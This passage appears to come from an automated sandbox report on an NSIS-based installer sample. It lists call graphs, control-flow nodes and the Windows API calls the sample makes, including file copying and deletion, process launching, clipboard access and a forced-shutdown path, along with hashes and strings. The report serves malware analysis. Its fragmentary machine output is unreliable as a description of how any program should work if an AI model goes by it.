lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                              Executed Functions

                                                                                              Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                              • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406902
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                              • ShowWindow.USER32(00000000), ref: 00405313
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                              • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                              • CreatePopupMenu.USER32 ref: 004053A2
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                              • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                              • EmptyClipboard.USER32 ref: 0040543D
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                              • CloseClipboard.USER32 ref: 0040549A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                              • String ID: New install of "%s" to "%s"${
                                                                                              • API String ID: 2110491804-1641061399
                                                                                              • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                              • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                              • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                              • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                              Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                              APIs
                                                                                              • #17.COMCTL32 ref: 004038CE
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                              • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                              • API String ID: 2435955865-3712954417
                                                                                              • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                              • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                              • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                              • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                              Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID: jF
                                                                                              • API String ID: 2295610775-3349280890
                                                                                              • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                              • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                              • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                              • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                              Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 310444273-0
                                                                                              • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                              • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
